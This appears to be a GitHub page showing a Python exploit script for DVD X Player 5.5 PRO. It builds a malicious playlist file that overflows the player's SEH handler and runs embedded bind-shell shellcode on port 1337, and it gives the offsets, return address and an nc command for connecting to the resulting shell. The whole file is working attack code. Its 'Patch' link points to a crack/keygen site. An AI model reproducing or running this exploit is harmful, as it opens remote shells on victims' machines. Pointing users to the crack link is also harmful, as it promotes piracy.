-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathDVDXPlayerExploit.py
More file actions
67 lines (59 loc) · 3.42 KB
/
DVDXPlayerExploit.py
File metadata and controls
67 lines (59 loc) · 3.42 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#!/usr/bin/python -w
import sys
#-----------------------------------------------------------------------------------------------#
# Exploit: DVD X Player 5.5 PRO. Playlist file *.plf overflow #
# OS: Tested in Windows XP SP3 PRO (seems portable) #
# Software: https://www.dvd-x-player.com/dvd-player/ #
# Patch: https://keygens.pro/crack/142564/ #
# #
# Author: Oraclox (Brandon ceja) #
#-----------------------------------------------------------------------------------------------#
filename = "dolphin.plf"
#-----------------------------------------------------------------------------------------------#
# Badchars: \x00\x0A\x0D\x1a #
# Shellcode: -p windows/shell_bind_tcp LPORT=1337 -b "\x00\x0A\x0D\x1A" -f c" #
#-----------------------------------------------------------------------------------------------#
# Connect using nc -nv 192.168.211.128 1337 #
#-----------------------------------------------------------------------------------------------#
shellcode = (
"\xd9\xee\xba\x98\xa0\x24\x0c\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x53\x31\x56\x17\x03\x56\x17\x83\x76\x5c\xc6\xf9\x7a\x75\x85"
"\x02\x82\x86\xea\x8b\x67\xb7\x2a\xef\xec\xe8\x9a\x7b\xa0\x04"
"\x50\x29\x50\x9e\x14\xe6\x57\x17\x92\xd0\x56\xa8\x8f\x21\xf9"
"\x2a\xd2\x75\xd9\x13\x1d\x88\x18\x53\x40\x61\x48\x0c\x0e\xd4"
"\x7c\x39\x5a\xe5\xf7\x71\x4a\x6d\xe4\xc2\x6d\x5c\xbb\x59\x34"
"\x7e\x3a\x8d\x4c\x37\x24\xd2\x69\x81\xdf\x20\x05\x10\x09\x79"
"\xe6\xbf\x74\xb5\x15\xc1\xb1\x72\xc6\xb4\xcb\x80\x7b\xcf\x08"
"\xfa\xa7\x5a\x8a\x5c\x23\xfc\x76\x5c\xe0\x9b\xfd\x52\x4d\xef"
"\x59\x77\x50\x3c\xd2\x83\xd9\xc3\x34\x02\x99\xe7\x90\x4e\x79"
"\x89\x81\x2a\x2c\xb6\xd1\x94\x91\x12\x9a\x39\xc5\x2e\xc1\x55"
"\x2a\x03\xf9\xa5\x24\x14\x8a\x97\xeb\x8e\x04\x94\x64\x09\xd3"
"\xdb\x5e\xed\x4b\x22\x61\x0e\x42\xe1\x35\x5e\xfc\xc0\x35\x35"
"\xfc\xed\xe3\xa0\xf4\x48\x5c\xd7\xf9\x2b\x0c\x57\x51\xc4\x46"
"\x58\x8e\xf4\x68\xb2\xa7\x9d\x94\x3d\xc2\x64\x10\xdb\xa6\x86"
"\x74\x73\x5e\x65\xa3\x4c\xf9\x96\x81\xe4\x6d\xde\xc3\x33\x92"
"\xdf\xc1\x13\x04\x54\x06\xa0\x35\x6b\x03\x80\x22\xfc\xd9\x41"
"\x01\x9c\xde\x4b\xf1\x3d\x4c\x10\x01\x4b\x6d\x8f\x56\x1c\x43"
"\xc6\x32\xb0\xfa\x70\x20\x49\x9a\xbb\xe0\x96\x5f\x45\xe9\x5b"
"\xdb\x61\xf9\xa5\xe4\x2d\xad\x79\xb3\xfb\x1b\x3c\x6d\x4a\xf5"
"\x96\xc2\x04\x91\x6f\x29\x97\xe7\x6f\x64\x61\x07\xc1\xd1\x34"
"\x38\xee\xb5\xb0\x41\x12\x26\x3e\x98\x96\x56\x75\x80\xbf\xfe"
"\xd0\x51\x82\x62\xe3\x8c\xc1\x9a\x60\x24\xba\x58\x78\x4d\xbf"
"\x25\x3e\xbe\xcd\x36\xab\xc0\x62\x36\xfe"
)
#-----------------------------------------------------------------------------------------------#
# Description: #
# (1) Overwrites SEH with pop pop ret instruction, so next instruction is nSEH #
# (2) Overwrites nSEH with jump short 6-bytes so it lands in the D's #
# (3) Place shellcode in the D's and GG #
#-----------------------------------------------------------------------------------------------#
# nSEH offset: 608 bytes #
# SEH = 0x61617619 : pop esi # pop edi # ret | EPG.dll #
# nSEH = "\xEB\x06" jump short 6-byte #
#-----------------------------------------------------------------------------------------------#
evil = "\x90" * 20 + shellcode
# Structure: AAA...AAA nSEH SEH shellcode DDDD...DDDDDD #
buffer = "A" * 608 + "\xEB\x06\x90\x90" + "\x19\x76\x61\x61" + evil + "D" * (1384-len(evil))
textfile = open(filename, "w")
textfile.write(buffer)
textfile.close()